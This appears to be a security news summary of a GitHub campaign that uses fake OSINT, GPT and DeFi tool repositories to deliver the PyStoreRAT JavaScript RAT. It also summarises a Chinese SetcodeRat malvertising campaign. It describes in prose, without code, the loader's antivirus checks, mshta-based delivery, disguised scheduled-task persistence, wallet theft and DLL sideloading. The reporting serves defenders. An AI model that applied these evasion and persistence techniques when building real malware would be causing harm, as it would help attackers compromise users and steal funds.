GitHub OSINT Repos Push PyStoreRAT, a Modular JS RAT

Threat actors are seeding GitHub with fake OSINT, GPT wrappers, DeFi bots, and security utilities to deliver PyStoreRAT, a previously undocumented modular JavaScript RAT. The loaders are tiny Python or JavaScript stubs that silently fetch a remote HTA and run it via mshta.exe.

Morphisec researcher Yonatan Edri reports the campaign began in mid-June 2025, with continual repo drops promoted on YouTube and X. Stars and forks were artificially inflated, echoing the Stargazers Ghost Network. Operators used new or dormant GitHub accounts and slipped the malicious code in so-called maintenance commits during October–November once projects trended. Many tools barely worked, serving only to legitimize the download-and-execute stub.

How the infection flows:

• Loader enumerates installed AV and searches for Falcon and Reason indicators to reduce visibility.
• If flagged, mshta.exe is launched via cmd.exe; otherwise it is invoked directly.
• A remote HTA retrieves and launches PyStoreRAT and establishes persistence using a scheduled task disguised as an NVIDIA self-update.
• The malware then contacts its server for follow-on commands.

What PyStoreRAT can do:

• Execute EXE payloads, including the Rhadamanthys info stealer
• Download and extract ZIP archives
• Fetch a malicious DLL and run it with rundll32.exe
• Pull raw JavaScript and execute it in memory via eval
• Install MSI packages
• Spawn secondary mshta.exe to load more HTA payloads
• Run PowerShell commands in memory
• Spread via removable drives by swapping documents with LNK shortcuts
• Delete its scheduled task to hinder forensics

Additional behaviors and targets:

• System profiling and admin privilege checks
• Scans for crypto wallet data linked to Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02
• Russian-language artifacts suggest an Eastern European actor

Bigger picture: a parallel campaign in China

• QiAnXin details SetcodeRat, spread via malvertising since October 2025 and disguised as popular installers like Google Chrome
• Installer verifies the victim is in a Chinese-speaking region (Zh-CN, Zh-HK, Zh-MO, Zh-TW) and checks a Bilibili URL; otherwise it exits
• Uses pnm2png.exe to sideload zlib1.dll, which decrypts qt.conf to run an embedded RAT DLL
• Communicates via Telegram or a conventional C2 and supports screenshots, keylogging, file and folder operations, process execution, cmd.exe, socket setup, system and network info collection, and self-update

Why it matters: PyStoreRAT exemplifies a shift to modular, script-first implants that abuse trusted platforms, adapt to controls, and evade EDR until late in the chain.

Source: The Hacker News